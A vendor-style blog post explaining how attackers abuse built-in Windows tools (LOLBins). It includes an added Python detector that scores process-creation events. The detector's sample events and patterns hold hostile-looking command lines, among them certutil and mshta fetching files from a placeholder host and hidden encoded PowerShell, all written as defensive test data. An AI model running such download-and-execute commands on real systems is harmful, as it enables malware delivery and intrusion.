LOLBins: No Laughing Matter!

By | February 23, 2025

Windows comes packed with many useful tools, but attackers can weaponize some of these same tools. These are called LOLBins (Living Off The Land Binaries); understanding them and how they work is essential for Windows security.

What are Windows LOLBins?

LOLBins are no laughing matter! They are legitimate built-in Windows programs that attackers abuse for malicious purposes. They aren’t malware themselves, but they are tools that can be used to carry out malicious activities.

Common Windows LOLBins and What Attackers Do With Them

PowerShell: A powerful scripting language. Attackers use it to download and execute malicious code, bypass security restrictions, and automate attacks. Think of it as a super-powered command prompt that can be used for good or evil.

certutil: A command-line tool for managing certificates. Attackers use it to download malicious files disguised as certificates. It can also be used to encode and decode data, making it useful for hiding malware.

bitsadmin: A tool for managing background file transfers. Attackers use it to download malware, often making it appear as a legitimate Windows update or download.

wmic (Windows Management Instrumentation Command-line): Provides an interface for accessing and managing Windows systems. Attackers use it to gather system information, execute commands, and even move laterally within a network.

regsvr32: A tool for registering and unregistering DLLs (Dynamic Link Libraries). Attackers abuse it to execute malicious code hidden within DLL files.

rundll32: Similar to regsvr32, used to run functions from DLLs. Attackers use it to execute malicious code.

mshta (Microsoft HTML Application Host): Can execute HTML and scripting code. Attackers use it to run malicious scripts, sometimes bypassing application whitelisting.

Why are Windows LOLBins becoming such a Problem?

Windows LOLBins are everywhere. They are present on every Windows system, giving attackers many options. Because they’re legitimate, their activity can be hard to distinguish from normal system operations, making them difficult to detect.

Some security software might overlook activity from LOLBins because it comes from trusted tools, even when that activity is malicious.
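The practical consequence of that last point is that a detector cannot flag a LOLBin by name alone; it has to weigh the context the process runs in. Here is an added example of that idea in Python (not Emsisoft's code or any product's detection logic): a small triage routine over Sysmon-style process-creation records. The events are constructed inline, and the indicator patterns, the set of "suspicious parent" applications, the scoring weights and the threshold are all illustrative assumptions that a real deployment would tune against its own baseline.

```python
"""Context-aware triage of process-creation events for the LOLBins named above.

Added example, not code from the original article. A bare `certutil -verify`
run from cmd.exe scores zero; the same binary downloading from a URL while
spawned by Word accumulates several independent signals and is flagged.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """Simplified Sysmon Event ID 1 (process creation) record."""
    image: str          # full path of the new process
    cmdline: str        # full command line
    parent_image: str   # full path of the creating process


# Binaries discussed in the article, keyed by lowercase file name.
LOLBINS = {"powershell.exe", "certutil.exe", "bitsadmin.exe", "wmic.exe",
           "regsvr32.exe", "rundll32.exe", "mshta.exe"}

# Argument indicators matching the abuse the article describes (download,
# encode/decode, remote command execution, script hosting). Assumed values.
RISKY_ARGS = {
    "certutil.exe":   [r"-urlcache", r"-(en|de)code\b"],
    "bitsadmin.exe":  [r"/transfer\b", r"/addfile\b"],
    "powershell.exe": [r"-e(nc|ncodedcommand)?\b", r"downloadstring",
                       r"-w(indowstyle)?\s+hidden"],
    "wmic.exe":       [r"process\s+call\s+create", r"/node:"],
    "mshta.exe":      [r"\b(javascript|vbscript):"],
}

URL_RE = re.compile(r"https?://", re.I)

# Document readers, mail clients and browsers rarely have a legitimate reason
# to spawn a system utility directly. Assumed, illustrative set.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe",
                      "msedge.exe", "chrome.exe", "firefox.exe", "acrord32.exe"}

THRESHOLD = 2  # minimum score to report; assumed value


def basename(path: str) -> str:
    """Lowercase file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> Tuple[int, List[str]]:
    """Score one event: +2 per risky argument, +1 for a URL, +2 for a bad parent."""
    name = basename(ev.image)
    if name not in LOLBINS:
        return 0, []
    score, reasons = 0, []
    for pat in RISKY_ARGS.get(name, []):
        if re.search(pat, ev.cmdline, re.I):
            score += 2
            reasons.append(f"risky argument /{pat}/")
    if URL_RE.search(ev.cmdline):
        score += 1
        reasons.append("URL on command line")
    parent = basename(ev.parent_image)
    if parent in SUSPICIOUS_PARENTS:
        score += 2
        reasons.append(f"spawned by {parent}")
    return score, reasons


def scan(events: List[ProcEvent], threshold: int = THRESHOLD):
    """Return (binary, score, reasons) for every event at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = triage(ev)
        if score >= threshold:
            hits.append((basename(ev.image), score, reasons))
    return hits


# Constructed sample events; paths, hosts and the base64 blob are placeholders.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -urlcache -split -f http://example.invalid/update.txt C:\Users\Public\update.txt",
              OFFICE + r"\WINWORD.EXE"),
    ProcEvent(r"C:\Windows\System32\certutil.exe",
              r"certutil.exe -verify C:\certs\corp-root.cer",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://example.invalid/invoice.hta",
              OFFICE + r"\OUTLOOK.EXE"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
              r"C:\Windows\System32\svchost.exe"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -w hidden -enc QUJDRA==",   # placeholder, not a payload
              r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    ProcEvent(r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s C:\Users\Public\update.dll",
              OFFICE + r"\EXCEL.EXE"),
    ProcEvent(r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe shell32.dll,Control_RunDLL desk.cpl",
              r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for name, score, reasons in scan(SAMPLE_EVENTS):
        print(f"{name:<15} score={score}  {'; '.join(reasons)}")
```

Of the seven constructed events, four are reported: the Word-spawned certutil download, the Outlook-spawned mshta, the hidden encoded PowerShell launched from a browser, and the regsvr32 run whose only signal is its Excel parent. The scheduled backup script and the Control Panel rundll32 call score zero even though they use the same binaries, which is the distinction the paragraph above is making.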

What Can You Do to Keep Safe?

Always keep Windows updated. Patching vulnerabilities in Windows reduces the chances of attackers exploiting LOLBins.

Don’t run PowerShell scripts, other scripts, or command-line commands from untrusted sources.

Always use a good security solution to detect malicious use of LOLBins by analyzing the context of their activity. Emsisoft protects you from LOLBins.

Remember: Attackers can use Windows’ built-in tools against you. By understanding how they do this, you can take steps to protect yourself. Staying informed and practicing good security habits are essential. If you already use Emsisoft you’re protected. If you don’t, do your homework to find out if your current antivirus software protects you from LOLBins. 

LOLBins are no laughing matter!

One thought on “LOLBins: No Laughing Matter!”

  1. Sandy E

    Emsisoft is the best. Thanks to you T.C. I wouldn’t even know about Emsisoft.
